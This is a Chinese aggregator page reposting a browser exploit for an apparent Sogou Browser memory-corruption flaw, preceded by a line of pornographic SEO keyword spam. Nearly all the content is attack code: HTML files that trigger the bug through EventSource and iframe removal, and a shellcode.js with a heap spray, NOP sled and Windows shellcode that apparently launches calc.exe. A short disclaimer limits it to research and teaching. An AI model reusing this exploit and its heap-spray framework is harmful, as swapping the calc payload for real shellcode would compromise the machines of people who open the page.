日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 前端技术 > HTML >内容正文

HTML

搜狗浏览器缓冲区溢出漏洞EXP

發(fā)布時(shí)間:2023/12/15 HTML 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 搜狗浏览器缓冲区溢出漏洞EXP 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

本站提供程序(方法)可能帶有***性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!

  • <!--test2.html-->
  • <html>
  • <body>
  • <script>
  • top.source = new EventSource("aaat.htm");
  • top.source.onerror = function(err) {
  • top.finish();
  • };
  • </script>
  • </body>
  • </html>
  • ?
  • ----------------
  • <!--test.html-->
  • <html>
  • <body>
  • <iframe id="test" width="1" height="1"> </iframe>
  • <script type="text/javascript" src="shellcode.js"></script>
  • <script>
  • var source;
  • shellcode();
  • function timer(){
  • over();
  • }
  • function runTest(){
  • document.getElementById("test").src = "test2.html";
  • }
  • function finish(){
  • document.body.removeChild(document.getElementById("test"));
  • setTimeout(timer,1000);
  • //gc();
  • }
  • runTest();
  • </script>
  • <A HREF="test.html"> go </A>
  • </body>
  • <html>
  • ?
  • ----------------
  • //shellcode.js
  • function gc() {
  • if (typeof GCController !== "undefined")
  • GCController.collect();
  • else {
  • function gcRec(n) {
  • if (n < 1)
  • return {};
  • var temp = {i: "ab" + i + (i / 100000)};
  • temp += "foo";
  • gcRec(n-1);
  • }
  • for (var i = 0; i < 1000; i++)
  • gcRec(10)
  • }
  • }
  • ?
  • function shellcode() {
  • var shell = unescape("%u6060%u96e9%u0000%u5600%uc931%u8b64%u3071%u768B%u8b0C%u1c76%u468b%u8b08%u207e%u368b%u3966%u184f%uf275%uc35e%u8b60%u246c%u8b24%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u37e3%u8b49%u8b34%uee01%uff31%uc031%uacfc%uc084%u0a74%ucfc1%u010d%ue9c7%ufff1%uffff%u7c3b%u2824%ude75%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u89e8%u2444%u611c%uadc3%u5250%ua7e8%uffff%u89ff%u8107%u08c4%u0000%u8100%u04c7%u0000%u3900%u75ce%uc3e6%u19e8%u0000%u9800%u8afe%u7e0e%ue2d8%u8173%u00ec%u0000%u8900%ue8e5%uff5d%uffff%uc289%ue2eb%u8d5e%u047d%uf189%uc181%u0008%u0000%ub6e8%uffff%uebff%u5b0e%uc031%u5350%u55ff%u9004%u6161%uc031%ue8c3%uffed%uffff%u6163%u636c%u652e%u6578%u0000");
  • var block = unescape("%u0c0c%u0c0c");
  • var nops = unescape("%u9090%u9090%u9090");
  • while (block.length <0x4000) block += block;
  • block=block.substring(0x90);
  • memory = new Array(1000);
  • var shellstr=new Array(3);
  • shellstr[0]=block;
  • shellstr[1]=nops;
  • shellstr[2]=shell;
  • var i;
  • for (i=0;i<0x1000;i++) memory[i] =shellstr.join("");
  • }
  • function over(){
  • var str=unescape("%u0c0c%u0c0c");
  • var str=unescape("%u0c0c%u0c0c");
  • strb="";
  • for(i=0;i<0x10000;++i){
  • if(i<0x40) strb=strb+str;
  • var sdiv=document.createElement("div");
  • sdiv.innerText=strb;
  • if(source.readyState==0x0c0c0c0c) {
  • //alert("over ok! run calc.exe!");
  • url=source.URL;
  • }
  • }
  • }
  • ?
  • //http://forum.sysinternals.com/sogou-explorer-buffer-overflow-vulnerability_topic27040.html

    • 轉(zhuǎn)載于:https://blog.51cto.com/hellxman/735844

    總結(jié)

    以上是生活随笔為你收集整理的搜狗浏览器缓冲区溢出漏洞EXP的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

    如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。